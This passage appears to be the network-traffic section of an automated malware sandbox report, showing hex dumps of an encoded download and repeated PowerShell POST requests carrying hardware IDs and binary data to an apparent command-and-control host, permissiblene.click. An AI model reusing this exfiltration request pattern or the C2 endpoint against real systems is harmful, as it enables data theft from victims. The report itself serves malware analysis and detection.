                                                                                                      Data Ascii: 39c4cj92Pea9axPoL4h2BiGe7QsWMSe8jQtsH98JAbgPhTwJHQAf3IlHMZtKqkxgQPKebjoTRtivMQp+s3pklC3zUVAFEFyKzg4/ykrwVDx65c9ueBMdnuhhDn6za2DTYPVQEVcaWo7YCHeJQ+UTY0T/h2V/XE/RrydOeqUrO5pC4EgTchdOjZ8WP5MN7RgkG7yMbnRdQdjmYwR3u2pl0n/sWhpXFFmP0gFjhEniGGVO
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 2f 38 38 6e 4e 46 52 64 6e 72 63 70 58 55 2b 2b 65 6e 4c 50 59 50 64 59 55 45 4a 61 52 73 54 59 42 54 48 53 44 65 49 59 61 6b 62 2f 67 47 35 31 55 31 66 52 37 32 6f 47 64 62 6c 68 62 4e 56 69 36 56 51 58 56 52 31 59 69 39 67 42 64 34 56 4f 71 6c 6f 6b 52 4f 54 50 4d 54 52 7a 56 64 33 73 66 51 4e 73 2f 58 51 74 77 79 33 67 55 6c 41 46 56 46 6d 4b 33 67 52 78 6d 45 58 68 48 32 46 52 39 34 5a 6b 65 56 4e 49 31 4f 42 71 44 6e 71 33 59 57 7a 51 61 65 70 54 46 6c 30 55 48 38 71 66 44 6d 6e 4b 46 61 6f 33 59 56 50 37 67 33 38 32 61 51 58 42 6f 58 42 4f 65 72 45 72 4f 35 70 6c 34 6c 30 54 56 68 74 63 6a 4e 51 62 63 5a 68 4c 35 78 46 32 52 66 6d 42 59 33 64 42 54 39 44 70 61 67 64 32 74 47 35 6b 33 69 32 70 48 68 64 46 56 41 66 45 2f 67 52 36 68 6b 66 39 46 43 52
                                                                                                      Data Ascii: /88nNFRdnrcpXU++enLPYPdYUEJaRsTYBTHSDeIYakb/gG51U1fR72oGdblhbNVi6VQXVR1Yi9gBd4VOqlokROTPMTRzVd3sfQNs/XQtwy3gUlAFVFmK3gRxmEXhH2FR94ZkeVNI1OBqDnq3YWzQaepTFl0UH8qfDmnKFao3YVP7g382aQXBoXBOerErO5pl4l0TVhtcjNQbcZhL5xF2RfmBY3dBT9Dpagd2tG5k3i2pHhdFVAfE/gR6hkf9FCR
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 58 68 42 53 64 54 70 5a 67 4e 78 2f 53 55 6a 33 58 57 6e 42 6c 42 33 46 30 75 48 31 55 74 45 69 55 50 6b 45 33 49 44 34 38 46 77 4e 46 52 4a 6e 72 63 70 41 33 79 31 62 58 48 56 59 4f 52 51 48 6c 49 52 55 49 7a 66 43 58 79 50 53 65 45 66 5a 30 37 34 6e 57 4e 30 57 30 44 66 35 57 4e 4f 4d 2f 31 73 65 35 6f 31 70 32 38 48 56 6c 5a 71 68 39 45 48 64 70 77 4e 39 56 70 39 41 2f 75 44 4b 53 77 54 53 4e 62 71 62 41 46 38 74 32 56 6d 30 47 48 76 55 42 4e 50 47 31 75 45 30 77 46 37 68 30 50 75 48 47 31 49 39 34 6c 70 64 56 6b 46 6b 4b 39 75 46 6a 33 6c 4b 31 66 64 59 65 70 52 55 6d 67 58 55 59 72 59 48 7a 47 56 41 2f 4e 55 59 30 2b 38 31 79 6c 34 57 6b 58 56 35 57 30 4f 65 72 42 75 59 4e 31 75 36 6c 6b 61 55 78 4e 62 69 4e 59 45 64 34 70 4b 37 68 46 32 52 76 57 44
                                                                                                      Data Ascii: XhBSdTpZgNx/SUj3XWnBlB3F0uH1UtEiUPkE3ID48FwNFRJnrcpA3y1bXHVYORQHlIRUIzfCXyPSeEfZ074nWN0W0Df5WNOM/1se5o1p28HVlZqh9EHdpwN9Vp9A/uDKSwTSNbqbAF8t2Vm0GHvUBNPG1uE0wF7h0PuHG1I94lpdVkFkK9uFj3lK1fdYepRUmgXUYrYHzGVA/NUY0+81yl4WkXV5W0OerBuYN1u6lkaUxNbiNYEd4pK7hF2RvWD
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 76 49 72 33 5a 41 5a 50 31 73 62 35 6f 31 70 31 63 5a 54 78 70 52 6a 64 49 50 65 59 31 44 35 78 39 69 53 50 75 49 62 33 6c 62 53 4e 76 73 61 41 70 33 72 32 68 6f 30 47 44 74 48 6c 34 64 45 30 66 45 68 30 6c 57 68 6d 54 36 44 33 5a 56 76 4a 41 6e 62 52 4e 43 30 71 38 78 54 6e 36 79 59 6d 7a 53 5a 65 68 52 46 46 4d 53 57 59 6e 61 42 6e 75 59 52 65 51 5a 62 30 7a 33 6e 57 6c 35 56 30 6e 61 35 32 49 45 50 66 4d 72 5a 4d 49 74 76 78 34 6c 55 42 74 66 68 38 6c 4a 62 73 52 55 71 68 4e 6f 41 36 54 50 5a 58 70 54 53 74 4c 6a 59 67 5a 38 73 57 56 6b 33 32 54 76 56 67 4a 63 45 46 65 46 30 51 5a 77 6a 6b 6a 76 45 47 4e 48 2b 6f 41 70 4f 68 4e 43 78 71 38 78 54 6c 4b 61 58 69 48 37 56 36 64 42 58 6b 52 55 57 49 69 66 55 54 47 47 54 75 59 63 61 30 58 31 67 32 4e 39 57
                                                                                                      Data Ascii: vIr3ZAZP1sb5o1p1cZTxpRjdIPeY1D5x9iSPuIb3lbSNvsaAp3r2ho0GDtHl4dE0fEh0lWhmT6D3ZVvJAnbRNC0q8xTn6yYmzSZehRFFMSWYnaBnuYReQZb0z3nWl5V0na52IEPfMrZMItvx4lUBtfh8lJbsRUqhNoA6TPZXpTStLjYgZ8sWVk32TvVgJcEFeF0QZwjkjvEGNH+oApOhNCxq8xTlKaXiH7V6dBXkRUWIifUTGGTuYca0X1g2N9W
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 74 44 58 6d 34 5a 47 4c 62 61 2f 56 5a 47 55 38 61 55 6f 76 58 41 58 69 4c 53 65 38 5a 59 6b 2f 32 6a 6d 35 36 58 55 32 65 6f 53 6b 4a 5a 66 30 7a 49 2f 74 39 2f 45 77 47 55 44 56 53 69 35 38 57 50 35 4d 4e 37 52 67 6b 47 37 79 47 65 33 42 65 56 39 66 6f 5a 77 46 2b 72 32 70 75 30 58 2f 67 55 52 52 61 47 46 6d 4c 32 51 68 30 67 45 48 74 45 57 39 4d 38 4d 38 6e 4e 46 52 64 6e 72 63 70 49 48 61 75 66 47 44 55 5a 76 46 46 55 45 4a 61 52 73 54 59 42 54 48 53 44 65 6b 66 62 30 66 38 67 32 6c 77 58 6b 58 4d 34 47 34 4a 64 4c 5a 35 61 64 31 71 37 46 59 62 55 68 4a 4e 69 4e 45 62 64 4a 68 66 71 6c 6f 6b 52 4f 54 50 4d 54 52 6c 51 73 37 2f 61 6b 78 4d 71 32 68 31 30 57 44 72 48 67 38 54 44 52 2b 44 30 30 6b 70 79 6b 76 6c 48 57 64 4d 2f 59 5a 6c 65 56 5a 4d 32 2b
                                                                                                      Data Ascii: tDXm4ZGLba/VZGU8aUovXAXiLSe8ZYk/2jm56XU2eoSkJZf0zI/t9/EwGUDVSi58WP5MN7RgkG7yGe3BeV9foZwF+r2pu0X/gURRaGFmL2Qh0gEHtEW9M8M8nNFRdnrcpIHaufGDUZvFFUEJaRsTYBTHSDekfb0f8g2lwXkXM4G4JdLZ5ad1q7FYbUhJNiNEbdJhfqlokROTPMTRlQs7/akxMq2h10WDrHg8TDR+D00kpykvlHWdM/YZleVZM2+
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 73 31 6c 67 77 53 33 34 45 41 6b 64 45 31 50 45 68 30 6c 79 6a 55 37 72 48 6d 31 50 38 34 68 74 5a 6c 6c 43 7a 4f 35 6f 42 58 43 78 61 32 37 58 5a 2b 5a 58 48 56 45 5a 57 49 50 51 44 44 48 45 44 65 30 4d 4a 42 75 38 72 6d 52 2f 58 78 36 45 72 33 5a 41 5a 50 31 73 62 35 6f 31 70 31 34 61 57 42 35 53 68 39 41 4b 59 34 74 4c 2b 42 52 70 53 65 36 46 59 6e 46 65 53 4e 50 73 62 77 68 32 73 58 6c 71 32 6d 37 73 48 6c 34 64 45 30 66 45 68 30 6c 53 6e 56 76 67 45 32 68 56 39 34 35 71 59 6c 35 56 6e 71 45 70 48 33 71 73 4b 7a 76 4d 66 66 42 5a 44 78 4d 4e 48 34 50 54 53 53 6e 4b 53 2b 4d 53 59 30 58 79 6e 57 78 79 58 45 72 58 35 6d 30 47 66 72 31 76 5a 39 31 6f 35 46 49 62 57 68 64 51 67 4e 59 48 65 49 55 4e 70 46 52 6a 57 37 7a 58 4b 56 56 49 52 74 4c 69 4b 52 45
                                                                                                      Data Ascii: s1lgwS34EAkdE1PEh0lyjU7rHm1P84htZllCzO5oBXCxa27XZ+ZXHVEZWIPQDDHEDe0MJBu8rmR/Xx6Er3ZAZP1sb5o1p14aWB5Sh9AKY4tL+BRpSe6FYnFeSNPsbwh2sXlq2m7sHl4dE0fEh0lSnVvgE2hV945qYl5VnqEpH3qsKzvMffBZDxMNH4PTSSnKS+MSY0XynWxyXErX5m0Gfr1vZ91o5FIbWhdQgNYHeIUNpFRjW7zXKVVIRtLiKRE
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 35 51 74 34 45 5a 51 42 56 52 2f 6a 38 6b 4d 64 70 77 50 33 78 64 71 54 66 75 5a 4b 57 74 73 43 35 37 75 4b 56 5a 45 70 43 74 31 6d 6a 57 31 45 46 42 50 56 41 66 45 6d 41 70 6a 6d 45 76 70 41 6d 63 45 77 72 46 4f 59 6c 6c 43 7a 75 68 2b 41 54 33 7a 4b 32 79 61 4e 64 34 65 47 56 6f 50 54 70 4c 53 47 58 62 4b 63 71 52 55 66 41 4f 6b 7a 31 78 33 58 55 76 5a 2b 58 68 44 57 71 74 68 5a 4d 70 71 38 46 46 51 45 31 52 5a 78 49 64 61 50 38 70 4a 2b 31 51 38 45 36 37 55 50 43 63 45 46 59 7a 77 4a 78 63 39 71 79 73 37 69 43 4f 6e 54 46 41 46 56 42 69 48 7a 52 74 33 69 56 76 70 55 31 70 39 33 49 52 6c 64 31 39 45 32 61 38 6e 54 6e 4c 39 4d 31 71 61 62 76 56 4d 58 30 77 43 55 70 54 59 52 58 6d 62 51 4f 5a 55 4b 67 4f 77 69 32 4a 34 56 6b 4c 4f 6f 48 73 65 64 72 46 39
                                                                                                      Data Ascii: 5Qt4EZQBVR/j8kMdpwP3xdqTfuZKWtsC57uKVZEpCt1mjW1EFBPVAfEmApjmEvpAmcEwrFOYllCzuh+AT3zK2yaNd4eGVoPTpLSGXbKcqRUfAOkz1x3XUvZ+XhDWqthZMpq8FFQE1RZxIdaP8pJ+1Q8E67UPCcEFYzwJxc9qys7iCOnTFAFVBiHzRt3iVvpU1p93IRld19E2a8nTnL9M1qabvVMX0wCUpTYRXmbQOZUKgOwi2J4VkLOoHsedrF9
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 6b 65 41 68 31 4d 48 38 50 52 42 48 43 4a 51 2b 6b 47 64 6b 58 2f 6d 57 6f 7a 62 58 76 78 35 47 67 65 63 4b 78 6d 5a 38 78 54 32 58 6b 57 57 42 4e 68 75 75 67 59 64 70 6f 50 7a 42 64 79 51 4c 7a 42 4b 57 77 54 48 5a 37 49 62 77 74 36 2f 53 55 6a 33 69 32 2f 48 6a 39 57 46 55 2b 4a 7a 67 52 31 6e 41 2f 4e 45 6d 46 45 76 4d 45 70 65 42 4d 64 6e 75 42 34 43 58 75 34 62 43 2f 64 64 2b 41 65 58 68 30 61 48 39 79 66 42 6d 43 4e 53 2b 38 54 4b 45 58 79 67 53 6c 72 48 56 79 65 2b 53 6c 57 4c 76 4d 72 63 5a 6f 31 70 78 6b 65 55 42 56 63 69 74 77 62 59 34 78 4f 2f 42 63 6a 66 63 4b 76 65 58 64 48 51 75 2f 69 62 52 68 6f 76 6e 74 6b 35 46 50 48 54 68 4e 4a 45 78 43 6b 7a 77 52 6b 6d 30 72 36 4b 6c 70 30 37 59 68 35 4e 6e 56 47 79 4f 77 70 51 44 32 6c 4b 7a 75 61 54
                                                                                                      Data Ascii: keAh1MH8PRBHCJQ+kGdkX/mWozbXvx5GgecKxmZ8xT2XkWWBNhuugYdpoPzBdyQLzBKWwTHZ7Ibwt6/SUj3i2/Hj9WFU+JzgR1nA/NEmFEvMEpeBMdnuB4CXu4bC/dd+AeXh0aH9yfBmCNS+8TKEXygSlrHVye+SlWLvMrcZo1pxkeUBVcitwbY4xO/BcjfcKveXdHQu/ibRhovntk5FPHThNJExCkzwRkm0r6Klp07Yh5NnVGyOwpQD2lKzuaT
                                                                                                      2024-12-31 08:26:22 UTC1369INData Raw: 61 4b 6d 47 6c 30 67 68 51 68 30 7a 55 4b 6b 52 54 38 5a 70 34 63 30 4e 37 34 4e 68 34 43 57 33 2f 54 57 44 4d 62 71 63 51 55 45 56 55 42 38 54 2b 42 48 43 72 51 4f 74 55 65 77 33 6c 7a 33 38 30 43 78 57 51 72 33 74 4f 4a 66 30 73 59 4d 68 2f 34 56 30 47 58 6c 4e 68 75 76 41 45 61 59 46 44 35 42 64 61 66 64 69 45 65 58 4e 58 53 4d 54 52 56 7a 78 74 73 47 39 6f 31 47 72 32 48 6c 34 64 44 42 2f 63 6e 79 5a 38 6b 6b 62 6b 47 6d 63 42 32 49 52 35 63 31 64 49 78 4b 39 32 51 47 54 39 66 53 4f 43 50 61 6b 65 41 68 31 4d 48 38 50 63 47 32 4f 4d 54 76 77 58 49 33 33 43 75 6d 70 69 56 46 58 61 34 6e 4d 77 51 34 39 37 62 74 35 6d 36 56 6b 42 48 56 6f 66 6e 4a 39 52 4d 62 39 4f 2f 42 4e 30 52 2f 47 56 4b 57 73 64 58 4a 37 35 4b 56 59 74 38 79 74 78 6d 6a 57 6e 47 52
                                                                                                      Data Ascii: aKmGl0ghQh0zUKkRT8Zp4c0N74Nh4CW3/TWDMbqcQUEVUB8T+BHCrQOtUew3lz380CxWQr3tOJf0sYMh/4V0GXlNhuvAEaYFD5BdafdiEeXNXSMTRVzxtsG9o1Gr2Hl4dDB/cnyZ8kkbkGmcB2IR5c1dIxK92QGT9fSOCPakeAh1MH8PcG2OMTvwXI33CumpiVFXa4nMwQ497bt5m6VkBHVofnJ9RMb9O/BN0R/GVKWsdXJ75KVYt8ytxmjWnGR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.549986188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:23 UTC281OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=XAFS5EBEID00HP
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 12809
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:23 UTC12809OUTData Raw: 2d 2d 58 41 46 53 35 45 42 45 49 44 30 30 48 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 43 32 43 37 43 32 42 44 34 39 34 39 34 31 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 58 41 46 53 35 45 42 45 49 44 30 30 48 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 41 46 53 35 45 42 45 49 44 30 30 48 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 35 0d 0a 2d 2d 58 41 46 53 35 45 42 45 49 44
                                                                                                      Data Ascii: --XAFS5EBEID00HPContent-Disposition: form-data; name="hwid"0BC2C7C2BD494941961F82810656F945--XAFS5EBEID00HPContent-Disposition: form-data; name="pid"2--XAFS5EBEID00HPContent-Disposition: form-data; name="lid"yJaNLj--re5--XAFS5EBEID
                                                                                                      2024-12-31 08:26:24 UTC1128INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:24 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=r52d3ik4f6tlbhcah956auanfv; expires=Sat, 26 Apr 2025 02:13:02 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ukDggQdTbKN8pWUj6PoHzybloN2vZM1MHBLvge6U1fVaiSn35%2Bk%2BervFESgFdrUerrDyrnvJGnwGtPjLdJ1Hf9IWLyNSTaOyAsayZPPxxcC73NS3SzV7y%2FwQte7qrfnDIUgVgg7"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e269983d9e16-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1987&rtt_var=765&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13748&delivery_rate=1411992&cwnd=189&unsent_bytes=0&cid=306bc659af46e7b4&ts=546&x=0"
                                                                                                      2024-12-31 08:26:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-31 08:26:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.549987188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:24 UTC278OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=QAJY2769OHR
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 15033
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:24 UTC15033OUTData Raw: 2d 2d 51 41 4a 59 32 37 36 39 4f 48 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 43 32 43 37 43 32 42 44 34 39 34 39 34 31 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 51 41 4a 59 32 37 36 39 4f 48 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 41 4a 59 32 37 36 39 4f 48 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 35 0d 0a 2d 2d 51 41 4a 59 32 37 36 39 4f 48 52 0d 0a 43 6f 6e 74 65 6e
                                                                                                      Data Ascii: --QAJY2769OHRContent-Disposition: form-data; name="hwid"0BC2C7C2BD494941961F82810656F945--QAJY2769OHRContent-Disposition: form-data; name="pid"2--QAJY2769OHRContent-Disposition: form-data; name="lid"yJaNLj--re5--QAJY2769OHRConten
                                                                                                      2024-12-31 08:26:25 UTC1126INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:25 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=3kdl2n57b787s52jr23tav6o6u; expires=Sat, 26 Apr 2025 02:13:03 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cZpiMYD82NvrKJLLkreKbVqfRnnUXrKfOyAH6lVtwsDe4LSLrFcoxdvZ3x6E9Wm1cSzlX%2F049Vpf98ix3DUp6y1bST3nXJYJwN9d2fcVe5ZxPBaJpwuONIdFRoNPu56PMEb95Dq%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e2702bb0420d-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2916&min_rtt=2433&rtt_var=1879&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15969&delivery_rate=463565&cwnd=244&unsent_bytes=0&cid=a9ef2d9dbe612a54&ts=558&x=0"
                                                                                                      2024-12-31 08:26:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-31 08:26:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.549988188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:25 UTC276OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=NWPK6ZAAQ
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20511
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:25 UTC15331OUTData Raw: 2d 2d 4e 57 50 4b 36 5a 41 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 43 32 43 37 43 32 42 44 34 39 34 39 34 31 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 4e 57 50 4b 36 5a 41 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4e 57 50 4b 36 5a 41 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 35 0d 0a 2d 2d 4e 57 50 4b 36 5a 41 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                      Data Ascii: --NWPK6ZAAQContent-Disposition: form-data; name="hwid"0BC2C7C2BD494941961F82810656F945--NWPK6ZAAQContent-Disposition: form-data; name="pid"3--NWPK6ZAAQContent-Disposition: form-data; name="lid"yJaNLj--re5--NWPK6ZAAQContent-Dispos
                                                                                                      2024-12-31 08:26:25 UTC5180OUTData Raw: 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75
                                                                                                      Data Ascii: un 4F([:7s~X`nO`i`u
                                                                                                      2024-12-31 08:26:26 UTC1127INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:26 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=ggtgit65jghs673iotkb9c925q; expires=Sat, 26 Apr 2025 02:13:05 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNF9D4ItOiyOC6QNF%2Bp8hnGKJOKIRzWlt3b0uSyZ0pt5AqtOPaFBTvgT%2FfbbXjXXZpqheRRS85AnGQWvbH7lsyDYi8HjOzBeKCsD5EEeoqNPCS8FcDkEprtgHZQlxd3NwOn70seF"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e276f89b423b-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1610&rtt_var=616&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21467&delivery_rate=1756919&cwnd=226&unsent_bytes=0&cid=c90cb294d61fc7eb&ts=629&x=0"
                                                                                                      2024-12-31 08:26:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-31 08:26:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.549989188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:28 UTC279OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=FPNR0FJKAFCPR
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 5450
                                                                                                      Host: permissiblene.click
